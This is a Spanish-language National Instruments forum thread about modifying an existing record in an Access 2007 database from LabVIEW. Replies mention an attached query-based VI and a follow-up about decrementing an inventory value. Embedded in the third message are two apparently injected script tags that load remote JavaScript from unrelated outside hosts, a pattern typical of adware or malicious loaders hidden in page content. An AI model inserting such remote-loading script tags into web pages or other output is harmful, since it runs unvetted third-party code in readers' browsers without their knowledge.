Discusiones sobre Productos NI

cancelar
Mostrando los resultados de 
Buscar en lugar de 
Quiere decir: 

Como modificar un registro en una base de datos

Saludos, estoy haciendo un programa que sirve para llevar control de usuarios, es decir agregar, modificar y borrar usuarios en una base de datos Access 2007... (Voy a aclarar que ya conozco el "Database Connectivity Toolki")...

 

Ya he logrado Agregar y Borrar Registros especificos (Mis usuarios), pero no encuentro la manera de modificar los datos de un registros existente (Un Usuario)..

 

Por Ejemplo:

 

Supongamos que tengo un registro de 3 campos: -----> Rectangulo  - Color   - Verde  

 

Yo quiero modificar el valor del campo "Rectangulo" por "Cuadrado" y que me quede así:  Cuadrado - Color - Verde   ¿como puedo hacer eso?

Gabriel Arcia
0 kudos
Mensaje 1 de 5
5.028 Vistas

Saludos Gabriel_Arcia

 

Realice este vi con una base de datos en acces utilizando Microsoft Acces 2007, y lavbview 2011, lo que utilice son comandos de bases de datos que se llaman queries, y con la herramienta de labview que los ejecuta, te adjunto el vi (ModificarUnValorEnBDAccesUtilizandoQueries.vi) y tambien una imagen de como es que se toman los datos y la vista del cambio que implemento.

 

Espero y te sea de utilidad

 

Cesar Cifuentes

 

César Cifuentes
Ing. Eléctronico
Descargar todos
Mensaje 2 de 5
4.909 Vistas

Saludos, muchas gracias por responder.. tenia tiempo esperando por una respuesta... voy a probar su ejemplo y le digo si me funciono..

 Mil Gracias....

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Gabriel Arcia
0 kudos
Mensaje 3 de 5
4.887 Vistas

Gracias, me fue muy util

0 kudos
Mensaje 4 de 5
3.129 Vistas

Disculpe, Estoy intentado modificar de igual forma un registro primero tengo una entrada de strign, ese lo busco en un arreglo de 1D para obtener la fila, luego tengo predeterminada la columna que quiero modificar, ya logre obtener el dato en este caso son datos de una columna de cantidad es como un tipo inventario lo que estoy haciendo, lo que quiero es que al presionar un boton se descuente de 1 en uno y guardar ese nuevo valor en el registro, pero aun no logro hacerlo funcional. Estoy utlizando el Data  Base Toolkit y la funcion Update Data.

0 kudos
Mensaje 5 de 5
2.969 Vistas